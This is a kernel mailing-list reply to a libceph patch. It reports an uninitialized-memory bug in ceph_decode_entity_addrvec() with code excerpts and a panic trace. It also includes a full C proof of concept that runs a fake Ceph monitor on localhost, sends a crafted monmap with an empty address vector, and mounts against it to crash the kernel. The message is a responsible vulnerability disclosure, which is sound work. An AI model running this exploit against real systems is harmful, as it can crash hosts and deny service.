Re: [PATCH v3] libceph: tolerate addrvecs with multiple entries of the same type
From: XIAO WU
Date: Sat Jun 20 2026 - 21:29:54 EST
Hi Kefu,
I came across a Sashiko AI code review [1] that flagged a pre-existing
uninitialized-memory issue in `ceph_decode_entity_addrvec()`. When the
addrvec has zero entries (`addr_cnt == 0`), the function returns 0
without writing to `*addr`. Callers such as `ceph_monmap_decode()` pass
storage obtained from `kmalloc_flex()` as `addr` and then go on to use
it as if it had been filled in.
I was able to reproduce this in QEMU by running a fake Ceph monitor that
sends a monmap with an empty addrvec. With `panic_on_warn=1`, the
kernel hits a WARNING in `ceph_con_v1_try_read()` and panics.
On Thu, Jun 11, 2026 at 07:32:51PM +0800, Kefu Chai wrote:
> ceph_decode_entity_addrvec() currently rejects any addrvec containing
> more than one entry that matches the requested msgr type...
Your patch correctly tolerates duplicate entries, but the function still
returns success without touching `*addr` when `addr_cnt == 0`:
```c
// net/ceph/decode.c: ceph_decode_entity_addrvec()
if (!addr_cnt)
return 0; // *addr is still uninitialized
if (addr_cnt == 1 && !memchr_inv(&tmp_addr, 0, sizeof(tmp_addr)))
return 0; // *addr is left uninitialized here as well
```
Callers whose `addr` storage comes from a dynamic allocation then read whatever stale data that allocation contained:
```c
// net/ceph/mon_client.c: ceph_monmap_decode()
mon_inst = kmalloc_flex(..., num_mon, sizeof(*mon_inst));
// ...
ceph_decode_entity_addrvec(p, end, msgr2, &mon_inst[i].addr);
// mon_inst[i].addr may be uninitialized if addrvec was empty
```
[Reproduction]
I set up a fake Ceph v1 monitor on localhost that sends a monmap
containing a monitor entry with an empty addrvec (addr_cnt=0). Mounting
the Ceph filesystem against it triggers the monmap decode path, causing
the client to attempt a connection with the uninitialized address.
[Crash — kernel 7.1.0-rc6, panic_on_warn=1]
con->v1.connect_seq != le32_to_cpu(con->v1.in_reply.connect_seq)
WARNING: net/ceph/messenger_v1.c:901 at ceph_con_v1_try_read+0x59f7/0x7020
RIP: 0010:ceph_con_v1_try_read+0x59f7/0x7020
Call Trace:
<TASK>
ceph_con_workfn+0xa04/0x13c0
process_one_work+0xa20/0x1c50
worker_thread+0x6df/0xf30
kthread+0x387/0x4a0
ret_from_fork+0xb2c/0xdd0
</TASK>
Kernel panic - not syncing: kernel: panic_on_warn set ...
Full PoC source (poc.c):
---8<----------------------------------------------------------------
/*
* PoC: Uninitialized memory in ceph_decode_entity_addrvec()
* Compile: gcc -static -o poc poc.c
* Run: ./poc [port]
*   - port defaults to 16789
*   - must run with sufficient privileges to call mount(2), e.g. as root
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mount.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/poll.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <errno.h>
#include <fcntl.h>
/* Banner string that mon() sends back to the client; BNR is its length in bytes. */
#define BANNER "ceph v027"
#define BNR 9
/*
 * Size in bytes of one zero-filled blob that follows the banner.
 * NOTE(review): presumably sizeof(struct ceph_entity_addr) - confirm.
 */
#define ADR 136
/* Bytes mon() reads from the client first: banner plus one ADR-sized blob. */
#define CBNR (BNR+ADR)
/* Bytes mon() sends in return: banner plus two ADR-sized blobs. */
#define SBNR (BNR+2*ADR)
/* Leading tag bytes: TAG_RDY opens the 26-byte reply in mon(), TAG_MSG opens every message built by msg(). */
#define TAG_RDY 1
#define TAG_MSG 7
/* 16-bit value msg() stores at header offset 16. */
#define MON_MAP 4
/* Value msg() stores as a 64-bit little-endian field at header offset 36. */
#define ENT_MON 1
/* Size in bytes of the scratch buffer used by mon(). */
#define MSZ 16384
/* Short fixed-width aliases used throughout the PoC. */
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;

/* Byte-indexed lookup table for the reflected polynomial 0x82F63B78 (CRC-32C). */
static u32 ct[256];
/* Non-zero once ct[] has been filled in by ic(). */
static int ci;

/*
 * Fill ct[] on the first call; every later call returns immediately.
 * Must have run before crc() is used.
 */
static void ic(void)
{
	u32 byte;

	if (ci != 0)
		return;

	for (byte = 0; byte < 256; byte++) {
		u32 rem = byte;
		int bit;

		/* Shift out one bit at a time, folding in the polynomial on a 1. */
		for (bit = 8; bit > 0; bit--) {
			if (rem & 1)
				rem = (rem >> 1) ^ 0x82F63B78;
			else
				rem >>= 1;
		}
		ct[byte] = rem;
	}
	ci = 1;
}

/*
 * Fold l bytes starting at b into the running remainder c and return the
 * new remainder. No initial or final inversion is applied here; the caller
 * chooses the seed.
 */
static u32 crc(u32 c, const u8 *b, int l)
{
	for (; l != 0; l--) {
		u8 idx = (u8)(c ^ *b);

		b++;
		c = (c >> 8) ^ ct[idx];
	}
	return c;
}
/*
 * Store v at byte pointer b as an 8-, 16-, 32- or 64-bit value, least
 * significant byte first (little-endian).
 * W16, W32 and W64 evaluate both arguments more than once, so neither b
 * nor v may have side effects.
 */
#define W8(b,v) ((b)[0] = (u8)(v))
#define W16(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255)
#define W32(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255,(b)[2]=((v)>>16)&255,(b)[3]=((v)>>24)&255)
#define W64(b,v) do { int _i; for (_i=0; _i<8; _i++) (b)[_i]=((u64)(v)>>(_i*8))&255; } while(0)
/*
 * Bit 23 of the 64-bit field that mon() writes at offset 1 of its reply.
 * NOTE(review): presumably a Ceph feature bit - confirm which one.
 */
#define REQ_FEAT (1ULL << 23)
/*
 * Read exactly l bytes from descriptor f into b.
 *
 * Every read() is preceded by a poll() for POLLIN with a 15000 ms timeout.
 * Returns 0 once all l bytes have arrived (or immediately when l <= 0),
 * and -1 on poll timeout or error, end of stream, or read error.
 */
static int rcv(int f, u8 *b, int l)
{
	u8 *dst = b;
	int left = l;
	int got;

	for (; left > 0; dst += got, left -= got) {
		struct pollfd pfd = { .fd = f, .events = POLLIN };

		if (poll(&pfd, 1, 15000) < 1)
			return -1;

		got = read(f, dst, left);
		if (got < 1)
			return -1;
	}
	return 0;
}
/*
 * Write all l bytes of b to descriptor f, retrying after short writes.
 *
 * Returns 0 once everything has been written (or immediately when l <= 0),
 * and -1 as soon as write() returns zero or an error.
 */
static int snd(int f, u8 *b, int l)
{
	u8 *src = b;
	int left = l;

	while (left > 0) {
		int put = write(f, src, left);

		if (put < 1)
			return -1;
		src += put;
		left -= put;
	}
	return 0;
}
/*
 * Write a 5-byte record at b: the byte 2 followed by a 32-bit little-endian
 * zero. Returns the number of bytes written (always 5).
 * NOTE(review): presumably the addrvec marker byte plus an entry count of 0,
 * i.e. the empty addrvec the PoC is built around - confirm against the decoder.
 */
static int ea(u8 *b)
{
	u8 *count = b + 1;

	W8(b, 2);
	W32(count, 0);
	return 5;
}
/*
 * Build the message payload at b and return its length in bytes.
 *
 * Layout, in write order (all integers little-endian):
 *   - 32-bit outer length (patched last)
 *   - bytes 6, 1 and a 32-bit body length (patched)
 *   - 64-bit 0x42, 32-bit 1
 *   - two groups of: bytes 1, 1 and a 32-bit 0
 *   - 32-bit 1
 *   - length-prefixed string "m0"
 *   - bytes 1, 1 and a 32-bit record length (patched)
 *   - length-prefixed string "m0"
 *   - the 5-byte record produced by ea()
 *
 * NOTE(review): the body and record lengths count only the bytes that follow
 * their own length field, but the outer length is measured from the start of
 * the outer length field itself, so it includes those 4 bytes. Confirm which
 * convention the receiver expects.
 * NOTE(review): field meanings are not named in the PoC; verify the widths
 * (e.g. the 8-byte leading value) against the monmap decoder.
 */
static int pay(u8 *b)
{
	u8 *w = b;	/* write cursor */
	u8 *outer_len, *body_len, *body, *rec_len, *rec;
	int rec_sz, body_sz, outer_sz;
	int i;

	outer_len = w;
	W32(w, 0);
	w += 4;

	W8(w, 6);
	w += 1;
	W8(w, 1);
	w += 1;
	body_len = w;
	W32(w, 0);
	w += 4;
	body = w;

	W64(w, 0x42);
	w += 8;
	W32(w, 1);
	w += 4;

	/* Two identical 6-byte groups: bytes 1, 1 and a zero 32-bit length. */
	for (i = 0; i < 2; i++) {
		W8(w, 1);
		w += 1;
		W8(w, 1);
		w += 1;
		W32(w, 0);
		w += 4;
	}

	W32(w, 1);
	w += 4;

	W32(w, 2);
	w += 4;
	memcpy(w, "m0", 2);
	w += 2;

	W8(w, 1);
	w += 1;
	W8(w, 1);
	w += 1;
	rec_len = w;
	W32(w, 0);
	w += 4;
	rec = w;

	W32(w, 2);
	w += 4;
	memcpy(w, "m0", 2);
	w += 2;

	w += ea(w);

	/* Back-patch the three length fields now that the end is known. */
	rec_sz = (int)(w - rec);
	body_sz = (int)(w - body);
	outer_sz = (int)(w - outer_len);
	W32(rec_len, rec_sz);
	W32(body_len, body_sz);
	W32(outer_len, outer_sz);

	return (int)(w - b);
}
/*
 * Header and footer sizes, in bytes, used when framing a message in msg().
 * NOTE(review): confirm both against the on-wire header/footer sizes the
 * receiver expects for the negotiated features.
 */
#define HS 60
#define FS 13
/*
 * Frame one message at b and return its total length.
 *
 * Framing: the TAG_MSG byte, an HS-byte header, the payload from pay(),
 * then an FS-byte all-zero footer. Header fields written (little-endian):
 * s at offset 0, MON_MAP at 16, 127 at 18, 1 at 20, the payload length
 * at 22, ENT_MON at 36, 0 at 44, and at offset 56 the crc() of the first
 * 56 header bytes seeded with 0. ic() must have run beforehand.
 */
static int msg(u8 *b, u64 s)
{
	u8 *hdr = b + 1;
	u8 *front = hdr + HS;
	int front_len;
	u32 hdr_crc;

	b[0] = TAG_MSG;
	memset(hdr, 0, HS);

	front_len = pay(front);
	memset(front + front_len, 0, FS);

	W64(hdr + 0, s);
	W16(hdr + 16, MON_MAP);
	W16(hdr + 18, 127);
	W16(hdr + 20, 1);
	W32(hdr + 22, front_len);
	W64(hdr + 36, ENT_MON);
	W64(hdr + 44, 0);

	/* Compute once: W32 would otherwise evaluate the call for every byte. */
	hdr_crc = crc(0, hdr, 56);
	W32(hdr + 56, hdr_crc);

	return 1 + HS + front_len + FS;
}
/*
 * Fake monitor: serve exactly one client on 127.0.0.1:pt.
 *
 * Sequence:
 *   1. listen and wait up to 60 s for a connection;
 *   2. read CBNR bytes from the client, answer with BANNER followed by
 *      2 * ADR zero bytes;
 *   3. read until at least 26 bytes of the client's next request have
 *      arrived, then answer with a 26-byte reply: TAG_RDY, REQ_FEAT at
 *      offset 1, the rest zero;
 *   4. send msg(b, 1), pause, send msg(b, 2).
 *
 * Returns 0 only when both messages were written; -1 on any socket error,
 * timeout or short exchange. Both descriptors are closed on every path,
 * and only if they were actually opened.
 */
static int mon(int pt)
{
	enum { REPLY_LEN = 26 };
	int s = -1, c = -1;
	int rc = -1;
	int on = 1;
	int got, ml;
	struct sockaddr_in a;
	struct pollfd pfd;
	u8 b[MSZ];

	ic();

	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0)
		goto out;
	/* Best effort: lets the PoC be re-run without waiting for TIME_WAIT. */
	setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));

	memset(&a, 0, sizeof(a));
	a.sin_family = AF_INET;
	a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
	a.sin_port = htons((uint16_t)pt);
	if (bind(s, (struct sockaddr *)&a, sizeof(a)) < 0)
		goto out;
	if (listen(s, 1) < 0)
		goto out;

	memset(&pfd, 0, sizeof(pfd));
	pfd.fd = s;
	pfd.events = POLLIN;
	if (poll(&pfd, 1, 60000) <= 0)
		goto out;

	c = accept(s, NULL, NULL);
	if (c < 0)
		goto out;

	/* Banner exchange. */
	if (rcv(c, b, CBNR) < 0)
		goto out;
	memcpy(b, BANNER, BNR);
	memset(b + BNR, 0, 2 * ADR);
	if (snd(c, b, SBNR) < 0)
		goto out;

	/* Consume the client's request; only its first REPLY_LEN bytes are required. */
	got = 0;
	while (got < REPLY_LEN) {
		int n;

		memset(&pfd, 0, sizeof(pfd));
		pfd.fd = c;
		pfd.events = POLLIN;
		if (poll(&pfd, 1, 10000) <= 0)
			goto out;
		n = read(c, b + got, MSZ - got);
		if (n <= 0)
			goto out;
		got += n;
	}

	memset(b, 0, REPLY_LEN);
	W8(b, TAG_RDY);
	W64(b + 1, REQ_FEAT);
	if (snd(c, b, REPLY_LEN) < 0)
		goto out;
	usleep(300000);

	ml = msg(b, 1);
	if (snd(c, b, ml) < 0)
		goto out;
	usleep(500000);

	ml = msg(b, 2);
	if (snd(c, b, ml) < 0)
		goto out;

	rc = 0;
out:
	if (c >= 0)
		close(c);
	if (s >= 0)
		close(s);
	return rc;
}
/*
 * Entry point: ./poc [port]
 *
 * Forks a child that runs the fake monitor on 127.0.0.1:port (default
 * 16789), then mounts a ceph filesystem against it at /tmp/mnt so the
 * kernel client talks to the fake monitor. Afterwards waits for the child
 * and tears the mount point down again.
 *
 * Returns 1 for an invalid port argument or a failed fork(), 0 otherwise.
 * A failing mkdir() or mount() is reported on stderr but does not change
 * the exit status.
 */
int main(int ac, char **av)
{
	long pt = 16789;
	pid_t pid;
	char s[64];

	if (ac >= 2) {
		char *end;

		errno = 0;
		pt = strtol(av[1], &end, 10);
		if (errno != 0 || end == av[1] || *end != '\0' ||
		    pt < 1 || pt > 65535) {
			fprintf(stderr, "invalid port: %s\n", av[1]);
			return 1;
		}
	}

	pid = fork();
	if (pid < 0) {
		/* Without the fake monitor there is nothing to mount against. */
		perror("fork");
		return 1;
	}
	if (pid == 0) {
		mon((int)pt);
		_exit(0);
	}

	/* Give the child time to reach listen(). */
	usleep(200000);

	if (mkdir("/tmp/mnt", 0700) < 0 && errno != EEXIST)
		perror("mkdir /tmp/mnt");

	snprintf(s, sizeof(s), "127.0.0.1:%d:/", (int)pt);
	if (mount(s, "/tmp/mnt", "ceph", 0, "name=admin") < 0)
		perror("mount");

	waitpid(pid, NULL, 0);
	umount2("/tmp/mnt", MNT_FORCE);
	rmdir("/tmp/mnt");
	return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -static -o poc poc.c
[1] https://sashiko.dev/#/patchset/20260611113251.2975975-1-k.chai%40proxmox.com
(Sashiko AI code review — "Uninitialized Memory", Severity: High)
Thanks,
XIAOWU